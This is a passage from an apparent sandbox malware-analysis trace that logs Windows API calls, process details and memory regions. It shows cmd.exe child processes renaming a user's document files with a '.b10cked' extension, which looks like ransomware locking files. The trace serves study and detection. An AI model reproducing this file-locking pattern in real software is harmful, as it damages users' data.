lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked", lpFilePart=0x26f210*="oR2F.csv.b10cked") returned 0x38 [0234.544] SetErrorMode (uMode=0x0) returned 0x1 [0234.544] SetLastError (dwErrCode=0x0) [0234.544] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv.b10cked")) returned 0xffffffff [0234.544] GetLastError () returned 0x2 [0234.544] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", fInfoLevelId=0x1, lpFindFileData=0x26eb8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eb8c) returned 0x390eb0 [0234.545] FindNextFileW (in: hFindFile=0x390eb0, lpFindFileData=0x26eb8c | out: lpFindFileData=0x26eb8c) returned 0 [0234.545] GetLastError () returned 0x12 [0234.545] FindClose (in: hFindFile=0x390eb0 | out: hFindFile=0x390eb0) returned 1 [0234.546] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", fInfoLevelId=0x1, lpFindFileData=0x3a1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1c08) returned 0x390eb0 [0234.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked", nBufferLength=0x104, lpBuffer=0x26ee24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked", lpFilePart=0x0) returned 0x38 [0234.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", nBufferLength=0x104, lpBuffer=0x26ee24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv", lpFilePart=0x0) returned 0x30 [0234.546] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv")) returned 0x20 [0234.546] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\or2f.csv.b10cked"), dwFlags=0x3) returned 1 [0234.547] FindClose (in: hFindFile=0x390eb0 | out: hFindFile=0x390eb0) returned 1 [0234.547] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26edd8 | out: _Buffer=" 1") returned 9 [0234.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.547] GetFileType (hFile=0x7) returned 0x2 [0234.707] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.707] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ed64 | out: lpMode=0x26ed64) returned 1 [0234.707] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.707] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ed98 | out: lpConsoleScreenBufferInfo=0x26ed98) returned 1 [0234.707] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0234.708] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x26edd8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0234.708] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26edbc, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x26edbc*=0x1a) returned 1 [0234.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.708] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.708] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.709] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.709] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.709] SetConsoleInputExeNameW () returned 0x1 [0234.709] GetConsoleOutputCP () returned 0x1b5 [0234.709] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.709] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.709] exit (_Code=0) Process: id = "631" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d40" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34998 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34999 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35000 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35001 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35002 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35003 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35004 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35005 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35006 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 35007 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35330 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35331 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35332 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 35333 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35334 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 35335 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35336 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35337 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35338 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35339 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35340 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35341 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35342 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35343 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35344 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 35345 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35346 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35347 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35348 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35349 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35350 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35351 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 35352 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 35353 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 869 os_tid = 0xf24 [0234.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afad4 | out: lpSystemTimeAsFileTime=0x2afad4*(dwLowDateTime=0xbf7a1a00, dwHighDateTime=0x1d440a9)) [0234.901] GetCurrentProcessId () returned 0xdf0 [0234.901] GetCurrentThreadId () returned 0xf24 [0234.901] GetTickCount () returned 0x4081a [0234.901] QueryPerformanceCounter (in: lpPerformanceCount=0x2afacc | out: lpPerformanceCount=0x2afacc*=29169010902) returned 1 [0234.901] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.901] __set_app_type (_Type=0x1) [0234.902] __p__fmode () returned 0x76b331f4 [0234.902] __p__commode () returned 0x76b331fc [0234.902] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.902] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.902] GetCurrentThreadId () returned 0xf24 [0234.902] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf24) returned 0x38 [0234.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.902] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.902] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.902] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afa64 | out: phkResult=0x2afa64*=0x0) returned 0x2 [0234.902] VirtualQuery (in: lpAddress=0x2afa9b, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.902] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.902] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.902] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.902] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.903] GetConsoleOutputCP () returned 0x1b5 [0234.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.903] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.903] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.903] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.903] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.903] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.903] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.903] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.903] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.904] GetEnvironmentStringsW () returned 0x90190* [0234.904] FreeEnvironmentStringsW (penv=0x90190) returned 1 [0234.904] GetEnvironmentStringsW () returned 0x90190* [0234.904] FreeEnvironmentStringsW (penv=0x90190) returned 1 [0234.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9d4 | out: phkResult=0x2ae9d4*=0x40) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0xb8, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x1, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x1, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x0, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x40, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x40, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x40, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.904] RegCloseKey (hKey=0x40) returned 0x0 [0234.904] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9d4 | out: phkResult=0x2ae9d4*=0x40) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x40, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x1, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x1, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.905] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x0, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.905] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x9, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.905] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x9, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.905] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x9, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.905] RegCloseKey (hKey=0x40) returned 0x0 [0234.905] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.905] srand (_Seed=0x5b8863c2) [0234.905] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"" [0234.905] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"" [0234.905] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.905] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x918f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.905] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.905] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.905] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.905] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.905] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.906] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.906] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.906] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.906] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.906] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.906] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.906] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.906] GetEnvironmentStringsW () returned 0x922e0* [0234.906] FreeEnvironmentStringsW (penv=0x922e0) returned 1 [0234.906] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.906] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.906] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.906] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.906] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.906] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.906] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.906] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.906] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.906] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af7a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.906] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af7a0, lpFilePart=0x2af79c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af79c*="Desktop") returned 0x18 [0234.906] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.906] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af51c | out: lpFindFileData=0x2af51c) returned 0x90020 [0234.907] FindClose (in: hFindFile=0x90020 | out: hFindFile=0x90020) returned 1 [0234.907] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af51c | out: lpFindFileData=0x2af51c) returned 0x90020 [0234.907] FindClose (in: hFindFile=0x90020 | out: hFindFile=0x90020) returned 1 [0234.907] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af51c | out: lpFindFileData=0x2af51c) returned 0x90020 [0234.907] FindClose (in: hFindFile=0x90020 | out: hFindFile=0x90020) returned 1 [0234.907] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.907] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.907] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.907] GetEnvironmentStringsW () returned 0x92b00* [0234.907] FreeEnvironmentStringsW (penv=0x92b00) returned 1 [0234.907] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.908] GetConsoleOutputCP () returned 0x1b5 [0234.908] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.908] GetUserDefaultLCID () returned 0x409 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af8e0, cchData=128 | out: lpLCData="0") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af8e0, cchData=128 | out: lpLCData="0") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af8e0, cchData=128 | out: lpLCData="1") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.909] GetLocaleInfoW (in: 